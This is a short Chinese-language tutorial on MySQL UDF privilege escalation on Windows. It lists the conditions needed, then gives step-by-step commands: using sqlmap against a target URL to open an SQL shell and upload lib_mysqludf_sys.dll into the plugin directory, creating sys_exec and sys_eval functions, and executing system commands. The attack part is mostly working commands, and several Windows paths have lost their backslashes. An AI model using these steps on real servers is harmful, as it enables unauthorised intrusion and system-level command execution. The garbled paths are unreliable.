udf提权

1.原理

UDF提权是利用MYSQL的自定义函数功能，将MYSQL账号转化为系统system权限

2.利用条件

Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。

Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32，在windows2000下放置于

c:winntsystem32。

掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数，一般以root账号为佳，

具备`root账号所具备的权限的其它账号也可以。

可以将udf.dll写入到相应目录的权限。

1.连接mysql数据打开一个交互shell:

sqlmap.py -u "url" --sql-shell

select @@version;

select @@plugin_dir;

C:XXXX\mysql\mysql5.6.17\lib\plugin\

2.利用sqlmap上传lib_mysqludf_sys到MySQL插件目录:

sqlmap.py -u "url" --file-write=自己的目录/lib_mysqludf_sys.dll --file-dest=C:XXXX\\mysql\mysql5.6.17\lib\plugin\lib_mysqludf_sys.dll

CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

select sys_eval('ver');